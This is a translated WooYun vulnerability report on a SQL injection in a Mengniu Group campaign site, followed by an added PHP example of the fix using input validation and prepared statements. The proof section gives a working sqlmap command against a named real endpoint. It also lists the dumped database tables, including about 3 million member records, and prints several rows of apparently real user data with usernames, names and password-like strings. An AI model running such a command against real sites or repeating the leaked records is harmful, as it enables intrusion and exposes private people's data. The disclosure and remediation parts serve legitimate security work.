
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-082173

Title: Mengniu Group high-risk SQL injection (about 3 million users' records at risk)

Vendor: 蒙牛集团 (Mengniu Group)

Author: 黑暗游侠

Submitted: 2014-11-06 10:33

Fix deadline: 2014-12-21 10:34

Public disclosure: 2014-12-21 10:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-11-06: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2014-12-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Mengniu Group high-risk SQL injection # a large number of users at risk

Detailed description:

Mengniu Group high-risk SQL injection # a large number of users at risk
About 3 million (300W) user records

Proof of vulnerability:

sqlmap -u "http://zhenguoli.mengniu.com.cn/ajax_get_news.php" --data="id=*" --dbs


Database: zgltest
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| zgl_member | 2993006 |
| zgl_member_usermeta | 2987775 |
| zgl_card_record | 2405573 |
| zgl_myhd | 33573 |
| zgl_delivery_address | 20109 |
| zgl_gift_record | 20102 |
| zgl_message_data | 10756 |
| zgl_person_test | 9041 |
| zgl_game_share | 6457 |
| zgl_friend | 4776 |
| zgl_linkage | 3284 |
| zgl_game_score | 2584 |
| zgl_message | 540 |
| zgl_menu | 276 |
| zgl_attachment | 209 |
| zgl_model_field | 146 |
| zgl_clearlog | 130 |
| zgl_attachment_index | 109 |
| zgl_hits | 33 |
| zgl_search | 33 |
| zgl_message_group | 32 |
| zgl_cache | 31 |
| zgl_sso_messagequeue | 19 |
| zgl_category | 16 |
| zgl_module | 16 |
| zgl_news | 15 |
| zgl_news_data | 15 |
| zgl_type | 13 |
| zgl_category_priv | 10 |
| zgl_pay_account | 10 |
| zgl_download | 8 |
| zgl_download_data | 8 |
| zgl_member_detail | 8 |
| zgl_urlrule | 8 |
| zgl_member_group | 7 |
| zgl_model | 7 |
| zgl_admin_role | 6 |
| zgl_duihuan_jifen | 6 |
| zgl_duihuan_jifen_data | 6 |
| zgl_content_check | 5 |
| zgl_public_rzhi | 5 |
| zgl_public_rzhi_data | 5 |
| zgl_special | 5 |
| zgl_sso_settings | 5 |
| zgl_sso_members | 4 |
| zgl_workflow | 4 |
| zgl_member_menu | 3 |
| zgl_sso_session | 3 |
| zgl_page | 2 |
| zgl_plugin_var | 2 |
| zgl_position_data | 2 |
| zgl_admin | 1 |
| zgl_plugin | 1 |
| zgl_position | 1 |
| zgl_site | 1 |
| zgl_sso_admin | 1 |
| zgl_sso_applications | 1 |
+---------------------------------------+---------+
<blank> | 0 | 1330272000 | irishan | <blank> | 你我十八岁 | 10 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |
| 0 | 48 | 1 | 0 | 2 | <blank> | 3563625 | 0 | 0 | <blank> | [email protected] | 0 | <blank> | <blank> | 0.00 | 0 | 0 | <blank> | 0 | 1330272000 | liutianquan | <blank> | shaojun1986 | 2 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 2 |
| 0 | 49 | 1 | 0 | 2 | <blank> | 3563701 | 0 | 0 | <blank> | <blank> | 0 | <blank> | <blank> | 0.00 | 1330272000 | 0 | <blank> | 0 | 1330272000 | 吴玉寿 | <blank> | shen123 | 30 | 2 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |
| 0 | 50 | 1 | 0 | 2 | <blank> | 3563702 | 0 | 0 | <blank> | [email protected] | 0 | <blank> | <blank> | 0.00 | 1330272000 | 0 | <blank> | 0 | 1330272000 | 878703004 | <blank> | wuancheng | 10 | 3 | 2014-03-03 15:04:12 | <blank> | 0 | 10 |

Fix recommendation:

Filter (validate) the input.
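The report's one-line fix is "filter". For a PHP endpoint like the one shown (a POST parameter `id` fed into a query), input validation alone is fragile; the durable fix is a fixed SQL string with the value bound as a parameter, with validation as a first line of defence. The following is an added illustration, not the site's actual ajax_get_news.php (whose source is not on this page): the function names, the column names and the assumption that the script selects a single row from the `zgl_news` table (a table name taken from the sqlmap output above) are all hypothetical.

```php
<?php
// Added example, not the original ajax_get_news.php. Assumes the endpoint reads a POST
// parameter "id" and returns one row of zgl_news (table name from the report; the
// columns id and title are assumed).

// --- Vulnerable pattern: the raw POST value is concatenated into the SQL text. ---
// Whatever the client sends for "id" becomes part of the query syntax, which is
// exactly what lets a tool enumerate the whole database as shown above.
function get_news_vulnerable(mysqli $db, array $post): ?array
{
    $id  = $post['id'] ?? '';
    $sql = "SELECT id, title FROM zgl_news WHERE id = $id";
    $result = $db->query($sql);
    return $result ? $result->fetch_assoc() : null;
}

// --- Hardened version: validate the type, then bind the value as a parameter. ---
function get_news_safe(PDO $db, array $post): ?array
{
    // 1. "Filter": reject anything that is not a positive integer before it
    //    reaches the database. This alone is not the fix, but it shrinks the
    //    input space and gives you a clean 400 to log and alert on.
    $id = filter_var(
        $post['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        http_response_code(400);
        return null;
    }

    // 2. Prepared statement: the SQL text is constant; $id travels to the
    //    server as data and can never change the query structure.
    $stmt = $db->prepare('SELECT id, title FROM zgl_news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (DSN and credentials are placeholders; zgltest is the database name
// from the report):
// $pdo = new PDO(
//     'mysql:host=localhost;dbname=zgltest;charset=utf8mb4',
//     'DB_USER_PLACEHOLDER',
//     'DB_PASS_PLACEHOLDER',
//     [
//         PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//         PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
//     ]
// );
// header('Content-Type: application/json');
// echo json_encode(get_news_safe($pdo, $_POST));
```

Two design points worth noting. Setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the MySQL server itself separate query text from parameters rather than having the PDO driver escape and splice them client-side. And the table listing above shows the news endpoint's database account could read every table in `zgltest`, including the 2.99-million-row `zgl_member` table; a database user scoped to the handful of tables a public news script actually needs would not have prevented the injection, but it would have bounded what a successful one could reach.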

Copyright notice: when reposting, please credit the source: 黑暗游侠@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond

Vulnerability Rank: 15 (WooYun rating)